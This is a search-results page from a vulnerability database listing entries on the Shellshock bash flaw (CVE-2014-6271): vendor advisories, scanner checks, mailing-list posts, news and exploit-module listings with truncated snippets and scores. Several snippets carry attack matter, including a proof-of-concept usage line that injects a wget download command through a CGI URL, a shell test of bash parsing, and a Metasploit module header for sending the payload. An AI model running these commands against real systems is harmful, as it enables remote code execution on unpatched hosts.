Lucene search
+L

2693 matches found

OpenVAS
OpenVAS
added 2014/09/25 12:0 a.m.39 views

CentOS Update for bash CESA-2014:1293 centos5

The remote host is missing an update for the SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

10CVSS8.7AI score0.99999EPSS
SaveExploits139References5
securityvulns
securityvulns
added 2014/09/25 12:0 a.m.271 views

Re: [oss-security] CVE-2014-6271: remote code execution through bash

Florian Weimer: Chet Ramey, the GNU bash upstream maintainer, will soon release official upstream patches. http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017 http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018 http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052...

10CVSS0.3AI score0.99999EPSS
SaveExploits139
securityvulns
securityvulns
added 2014/09/25 12:0 a.m.63 views

Re: [oss-security] CVE-2014-6271: remote code execution through bash

Tavis Ormandy just tweetet this: https://twitter.com/taviso/status/514887394294652929 The bash patch seems incomplete to me, function parsing is still brittle. e.g. $ env X=' a=' sh -c "echo date"; cat echo -- Hanno Bock http://hboeck.de/ mail/jabber: [email protected] GPG: BBB51E42...

1.7AI score0.99999EPSS
SaveExploits139
securityvulns
securityvulns
added 2014/09/25 12:0 a.m.226 views

[USN-2362-1] Bash vulnerability

========================================================================== Ubuntu Security Notice USN-2362-1 September 24, 2014 bash vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

10CVSS10AI score0.99999EPSS
SaveExploits139
OpenVAS
OpenVAS
added 2014/09/25 12:0 a.m.54 views

RedHat Update for bash RHSA-2014:1293-01

The remote host is missing an update for the SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

10CVSS10AI score0.99999EPSS
SaveExploits139References5
Packet Storm
Packet Storm
added 2014/09/25 12:0 a.m.146 views

Bash Code Injection Proof Of Concept

/cgi-bin/ -c cmd Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit" Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271remotecodeexecutionthroughbash/ Test CGI Code : !/bin/bash echo "Content-type: text/html" echo "" echo...

10CVSS10AI score0.99999EPSS
SaveExploits139
Packet Storm
Packet Storm
added 2014/09/25 12:0 a.m.115 views

bashedCgi Remote Command Execution

require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author' = 'Stephane Chazelas' , vuln discovery 'Author' = 'Shaun...

10CVSS0.4AI score0.99999EPSS
SaveExploits139
Tenable Nessus
Tenable Nessus
added 2014/09/25 12:0 a.m.113 views

SuSE 11.3 Security Update : bash (SAT Patch Number 9740)

bash has been updated to fix a critical security issue. In some circumstances, the shell would evaluate shellcode in environment variables passed at startup time. This allowed code execution by local or remote attackers who could pass environment variables to bash scripts. CVE-2014-6271...

10CVSS8.4AI score0.99999EPSS
SaveExploits139References3
Tenable Nessus
Tenable Nessus
added 2014/09/25 12:0 a.m.65 views

openSUSE Security Update : bash (openSUSE-SU-2014:1226-1) (Shellshock)

bash was updated to fix a critical security issue, a minor security issue and bugs : In some circumstances, the shell would evaluate shellcode in environment variables passed at startup time. This allowed code execution by local or remote attackers who could pass environment variables to bash...

10CVSS8.5AI score0.99999EPSS
SaveExploits139References6
Slackware Linux
Slackware Linux
added 2014/09/24 11:37 p.m.88 views

[slackware-security] bash

New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. Here are the details from the Slackware 14.1 ChangeLog: patches/packages/bash-4.2.048-i486-1slack14.1.txz: Upgraded. This update fixes a vulnerability in bash related to how...

10CVSS9.6AI score0.99999EPSS
SaveExploits139
Metasploit
Metasploit
added 2014/09/24 10:44 p.m.115 views

OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the VMWare Fusion application, allowing an unprivileged local user to get root access. This module requires Metasploit: https://metasploit.com/download Curre...

9.8CVSS0.9AI score0.99999EPSS
SaveExploits139
CheckPoint Security
CheckPoint Security
added 2014/09/24 9:0 p.m.37 views

Check Point Response to CVE-2014-6271 and CVE-2014-7169 Bash Code Injection vulnerability

...

10CVSS1.8AI score0.99999EPSS
SaveExploits147Affected Software1
The Hacker News
The Hacker News
added 2014/09/24 8:19 p.m.138 views

Remotely Exploitable 'Bash Shell' Vulnerability Affects Linux, Unix and Apple Mac OS X

A Critical remotely exploitable vulnerability has been discovered in the widely used Linux and Unix command-line shell, known as Bash, aka the GNU Bourne Again Shell, leaving countless websites, servers, PCs, OS X Macs, various home routers, and many more open to the cyber criminals. Earlier toda...

10CVSS9.4AI score0.99999EPSS
SaveExploits139
OSV
OSV
added 2014/09/24 6:48 p.m.14 views

CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the modcgi and modcg...

9.8CVSS9.7AI score
SaveExploits0References243
NVD
NVD
added 2014/09/24 6:48 p.m.38 views

CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the modcgi and modcg...

10CVSS9.8AI score0.99999EPSS
SaveExploits139References171
OSV
OSV
added 2014/09/24 6:48 p.m.11 views

DEBIAN-CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the modcgi and modcg...

9.8CVSS9.2AI score0.99999EPSS
SaveExploits139References1
Prion
Prion
added 2014/09/24 6:48 p.m.52 views

Design/Logic Flaw

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the modcgi and modcg...

10CVSS7.8AI score0.99999EPSS
SaveExploits147References170Affected Software1
OSV
OSV
added 2014/09/24 6:42 p.m.13 views

MGASA-2014-0388 Updated bash packages fix CVE-2014-6271

Updated bash packages fix security vulnerability: A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote...

10CVSS9.9AI score0.99999EPSS
SaveExploits139References6
Mageia
Mageia
added 2014/09/24 6:42 p.m.97 views

Updated bash packages fix CVE-2014-6271

Updated bash packages fix security vulnerability: A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote...

10CVSS9.7AI score0.99999EPSS
SaveExploits139References5
CVE
CVE
added 2014/09/24 6:0 p.m.2943 views

CVE-2014-6271

CVE-2014-6271 (Shellshock) affects GNU Bash up to 4.3, enabling remote code execution by processing trailing strings after function definitions in environment variables. Exploitation vectors include OpenSSH ForceCommand, mod_cgi/mod_cgid in Apache, DHCP client scripts, and other environment-passi...

10CVSS9.9AI score0.99999EPSS
SaveIn wildExploits139References171Affected Software1
Rows per page
Query Builder